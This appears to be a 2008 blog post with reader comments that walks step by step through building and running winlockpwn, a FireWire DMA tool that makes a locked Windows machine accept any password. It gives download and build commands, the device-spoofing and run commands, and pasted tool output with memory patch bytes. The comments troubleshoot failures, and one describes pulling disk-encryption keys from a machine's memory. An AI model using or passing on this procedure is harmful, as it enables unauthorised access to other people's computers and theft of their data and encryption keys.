Saturday, March 08, 2008

Breaking Windows with Firewire and Ubuntu

Adam Boileau (http://www.storm.net.nz/projects/16) recently released source code for a tool that can unlock a password locked Windows machine in seconds. While quite simple to use the documentation is not clear on how exactly it is used or how the parts work. I hope this helps:

These instructions are for Ubuntu 7.10 - the Gutsy Gibbon:

First install the required libraries:
apt-get install libdc1394-13 libraw1394-dev swig
Second download and install Python 2.3:
wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvfz Python-2.3.6.tgz
mv Python-2.3.6 python-2.3
cd python-2.3
./configure
make
sudo make install
This will install python in /usr/local which means you need to update each script to reference this location.

Third, Fixup the libraw1394:
vim /usr/local/include/libraw1394/raw1394.h
search for and comment out the__attribute__ ((deprecated)); and be sure to put an ending semicolon on the previous line

Fourth, download the software from http://www.storm.net.nz/projects/16
wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vim Makefile (reference /usr/local instead of /usr for python)
make
Fifth, load the module and set some permissions:
sudo modprobe raw1394
sudo chmod 666 /dev/raw1394
Sixth, plug into the Windows machine

Seventh, load the ipod image to the firewire port
vim romtool (update the location of python to be /usr/local/bin/python)
./romtool -s 0 ipod.csr
Eighth, run businfo to check the port configurations:
vim businfo (update the location of python to be /usr/local/bin/python)
./businfo
At this point you should see two nodes listed. Node 0 is the ipod image that you loaded with romtool. Node 1 is the Windows machine.

Ninth, run the utility:
vim winlockpwn (update the location of python to be /usr/local/bin/python)
./winlockpwn 0 1 1
You can get more information on the winlockpwn parameters by running the command without parameters. The first parameter is the firewire port, the second is the node (in this case the node for Windows) and the third is the type of Windows password screen.

Tenth, login to Windows

Use any password you want...

20 comments:

Roven Drabo said...
This comment has been removed by the author.
lay s said...

Great post. I finally got pythonraw1394 to build, but I am still having issues on the last step. winlockpwn gives me an invalid argument error at line 163. Any ideas?

Timothy Legge said...

Thanks. winlockpwn is temperamental. I have found that on some locked down installations of windows it will even cause a blue screen. I am unsure what exactly the error means but be sure that your script is pointing to the specified version of python...

jpthe0n3 said...

I found that after uninstalling the Apple device drivers on the windows side, the exploit works even though windows will rediscover it.

Timothy Legge said...

Interesting. Do you have a list that you uninstalled?

Joe said...

same issue here, althouhg I used Knoppix: error on line 163:

File "./winlockpwn.py", line 163, in ?
mem = n.read(offset + so , len(pattern))
File "/KNOPPIX/usr/local/pythonraw1394/firewire.py", line 715, in read
data +=str(raw1394,raw1394_py_read(self.port.h.h, self.getNodeID(), long(addrhi), long(arrdlo), maxb))
IOError: [Errno 22] Invalid argument


from firewire.py, line 693: "If a node doesn't feel like fulfilling a request, it will raise an IOError."

Whatever that means. Deinstallation of the Ipod driver on the Windows target did not change the situation... hmmmm....

Paul said...

From the author: "Some people have reported trouble getting things to work - one thing to check is that once you've romtooled yourself as an ipod, that your hotplug doesn't load the kernel sbp driver. Move the sbp2.ko module out of the way so it cant load it, and reload your ohci1394 modules to reset stuff if you're having trouble."

I missed that at first, and had so-so results.

BTW- I built it on Fedora 6, and it seems OK (that is, it works more than it doesn't). Fedora 7 and above retooled the 1394 stack completely, so it doesn't work without major changes.

Paul said...

Don't put the startup stuff in a shell script. You need to wait a few seconds after the "modprobe raw1394" and the "chmod 666 /dev/raw1394". In a script, the chmod fails (though I guess you could put a sleep in the script...).

John Smith said...

I have done a lot of tests to understand why I have so many times this famous error: IOError: [Errno 22] Invalid argument
I think it's due to the way Windows handles the false ipod device. DMA is not always available. Only during a short time when Plug'n Play registers the device.
Is there anyone who reaches the reliability to avoid this error?

bm said...

I had exactly the same IO error as the guys before. I think one poster was right about the "being right in time". I unplugged and re plugged in the Firewire connection and immediately started the procedure and the process gets through without obvious failing, however it doesn't work to bypass the authentication with any password and the dmesg output also doesn't look very promising. I've tried that on two systems without any success.

~/fireinthewire3/pythonraw1394$ modprobe raw1394
:~/fireinthewire3/pythonraw1394$ sudo chmod 666 /dev/raw1394
:~/fireinthewire3/pythonraw1394$ ./romtool -s 0 ipod.csr
Init firwire, port 0
Updated 1024 byte ROM image from ipod.csr
:~/fireinthewire3/pythonraw1394$ ./winlockpwn 0 1 1
Winlockpwn v1.5 Metlstorm, 2k6. metlstorm@storm.net.nz
Target Selection:
Name : WinXP SP2 Fast User Switching Unlock
Notes : When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.
Pattern: 0x8BD8F7DB1ADBFEC3
Offset : [2905]
Patch : 0xbb01000000eb0990
Offset : 0
Scanning Options:
Start : 0x8000000
Stop : 0xffffffff
Pagesz : 4096
Init firwire, port 0 node 1
Snarfin' memories...
Checking for signature on page at 0x81856000 (2122072kB) at 22358 kB/s...


dmesg shows:

ieee1394: hpsb_update_config_rom() is deprecated
ieee1394: Failed to generate Configuration ROM image for host 0
ieee1394: Node suspended: ID:BUS[0-01:1023] GUID[00000e1003d43c21]

bm said...

and ./businfo

./businfo
Firewire initialized, with 1 ports available:
Enumerating port & node tree...
Port(number=0, generation=15, busid=1023, localid=0, nodeCount=2, name='ohci1394')
Node(number=0, nodeid=0xffc0)
ConfigROM(
Length : 16 bytes
CRC Length : 16 bytes
CRC : 0x7286 (Valid)
Bus ID : "1394"
GUID : 0x000a270002aa6ba7
Vendor : 0x00000a27 (Apple Computer, Inc.)
Link Speed : 2 (S400)
Max Record Size : 10 (2048 bytes)
Isochronous Capable : 0 (No)
Bus Master Capable : 0 (No)
Cycle Master Capable : 0 (No)
Cycle Master Clock Accuracy : 0 ppm
Isochronous Resource Manager Capable : 0 (No)
Root Directory: 16 bytes, crc: 0xf93c (Valid)
0 (Immediate Value), 12 (Node Capabilities): 0x83c0
0 (Immediate Value), 3 (Module Vendor ID): 0xa27 (Apple Computer, Inc.)
2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 68 bytes
TextLeaf: 32 bytes, crc: 0x96bc (Valid), language spec: 0x00000000 (XEROX CORPORATION), language id: 0x00000000,
text: "Apple Computer, Inc."
3 (Offset to Directory), 17 (Unit Directory): Offset: 4 bytes
Unit Directory: 56 bytes, crc: 0xe5a0 (Valid)
0 (Immediate Value), 18 (Unit Spec ID): 0x609e (ASC X3 - INFORMATION TECHNOLOGY STANDARDS SECRETARIATS)
0 (Immediate Value), 19 (Unit SW Version): 0x10483
0 (Immediate Value), 33 (Unknown 33): 0x1
0 (Immediate Value), 58 (Unknown 58): 0xa08
0 (Immediate Value), 62 (Unknown 62): 0x4c10
0 (Immediate Value), 56 (Unknown 56): 0x609e
0 (Immediate Value), 57 (Unknown 57): 0x104d8
0 (Immediate Value), 59 (Unknown 59): 0x0
0 (Immediate Value), 60 (Unknown 60): 0xa2700
1 (Offset to Immediate Value), 20 (Unit Dependant Info): Offset: 65536 bytes Offset Data: **Offset to immediate beyond end of CSR space**
0 (Immediate Value), 61 (Unknown 61): 0x3
0 (Immediate Value), 20 (Unit Dependant Info): 0xe0000
0 (Immediate Value), 23 (Model ID): 0x21
2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 40 bytes
TextLeaf: 16 bytes, crc: 0x34e7 (Valid), language spec: 0x00000000 (XEROX CORPORATION), language id: 0x00000000,
text: "iPod"
)
Node(number=1, nodeid=0xffc1)
ConfigROM(
Length : 16 bytes
CRC Length : 16 bytes
CRC : 0x149a (Invalid (0x9d61))
Bus ID : "1394"
GUID : 0x00000e1003d4fe30
Vendor : 0x0000000e (FUJITSU LIMITED)
Link Speed : 2 (S400)
Max Record Size : 10 (2048 bytes)
Isochronous Capable : 1 (Yes)
Bus Master Capable : 1 (Yes)
Cycle Master Capable : 1 (Yes)
Cycle Master Clock Accuracy : 0 ppm
Isochronous Resource Manager Capable : 1 (Yes)
Root Directory: 32 bytes, crc: 0x10cb (Invalid (0x0a69))
0 (Immediate Value), 12 (Node Capabilities): 0x83c0
0 (Immediate Value), 28 (Unknown 28): 0x50f2
0 (Immediate Value), 29 (Unknown 29): 0x2
0 (Immediate Value), 30 (Unknown 30): 0x0
0 (Immediate Value), 3 (Module Vendor ID): 0x50f2 (MICROSOFT CORP.)
2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 32 bytes
TextLeaf: 32 bytes, crc: 0x7c05 (Invalid (0x1183)), language spec: 0x80000000 (), language id: 0x00000409,
text: "Microsoft"
3 (Offset to Directory), 17 (Unit Directory): Offset: 8 bytes
Unit Directory: 16 bytes, crc: 0xade9 (Invalid (0x12e4))
0 (Immediate Value), 18 (Unit Spec ID): 0x50f2 (MICROSOFT CORP.)
0 (Immediate Value), 19 (Unit SW Version): 0x0
0 (Immediate Value), 23 (Model ID): 0x0
2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 40 bytes
TextLeaf: 48 bytes, crc: 0xfc7d (Invalid (0xd16f)), language spec: 0x80000000 (), language id: 0x00000409,
text: "1394 PC"
3 (Offset to Directory), 17 (Unit Directory): Offset: 112 bytes
Unit Directory: 16 bytes, crc: 0xadeb (Invalid (0x5178))
0 (Immediate Value), 18 (Unit Spec ID): 0x5e (USC INFORMATION SCIENCES INST)
0 (Immediate Value), 19 (Unit SW Version): 0x1
0 (Immediate Value), 23 (Model ID): 0x7bb0cf
2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 4 bytes
TextLeaf: 24 bytes, crc: 0x3891 (Invalid (0xb6f2)), language spec: 0x80000000 (), language id: 0x00000409,
text: "NIC1394"

Timothy Legge said...

I am afraid I have not gotten back to this since my initial experiments. It worked very well on the first machine I tested with but my last attempts had similar issues. I assumed that it was because it was a locked down Windows install but that may not have been the case.

Keep posting your results, I am sure someone will solve the issue...

Paul said...

I have broadened my horizons by using the 1394*** to dump memory of a machine using full-disk encryption software. I found what appears to be encryption keys. Logic says the keys are in memory somewhere. I was just surprised to find them so easily.

conundrum said...

I've been working on this on and off since I saw the article, interestingly configure for python 2.3 on Hardy Heron tells me my compiler can't make executables...

Ah, the joys of beta testing.

bm said...

conundrum:

You need the build essential package:

Do

sudo apt-get install build-essential

conundrum said...

bm: Thanks! I guess I've gotten too accustomed to only needing gcc.

SpudGunMan said...

same issue here, tested on two PC's seems that the "money time" is when the device is detected as a "Hard Drive" you start scanning the memory at that point. then the ipod comes in and all work ends with the said errors.

I could not get this to work on 2 computers.

SpudGunMan said...

UPDATE: May22

I got it to work, who knows if I was sleepy or a reboot fixed it. But when I powered up. Started from "step 5" and followed steps exactly.

Dell630 fully patched on the domain and it worked! I had full access as advertised.

something I noticed was that this morning businfo has 1 on the node 0 and not 0 for all the data it spits out on what will and wont work.

Sjors said...

For those who experience the following error:

IOError: [Errno 22] Invalid argumentMake sure you do step 5 with a disconnected fireware cable, then connect and do step 6, 7, etc.

In other words: follow the guide VERY literally.

Hope this resolves some issues...

breaknenter.org said...

Winlockpwn unfortunately does not work on newer Linux distros with the fresh IEEE1394 "Juju" FireWire stack. Try using FTWautopwn instead (currently works against Windows 7 32/64bit, Windows XP SP2/3):

http://www.breaknenter.org/2011/08/fire-through-the-wire/